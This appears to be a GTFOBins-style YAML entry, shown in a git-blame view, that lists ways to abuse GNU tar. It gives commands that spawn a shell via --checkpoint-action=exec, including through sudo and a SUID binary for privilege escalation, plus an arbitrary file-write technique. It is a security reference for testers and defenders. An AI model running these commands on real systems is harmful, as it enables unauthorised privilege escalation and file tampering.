2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-05-21 21:14:41 +02:00
|
|
|
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
|
|
sudo-enabled:
|
|
|
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
|
|
|
suid-limited:
|
2018-05-25 01:03:51 +02:00
|
|
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
2018-05-30 00:46:04 +02:00
|
|
|
file-write:
|
|
|
|
- description: This only works for GNU tar.
|
|
|
|
code: |
|
|
|
|
LFILE=file_to_write
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo data > "$TF"
|
|
|
|
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
2018-05-25 00:57:42 +02:00
|
|
|
---
|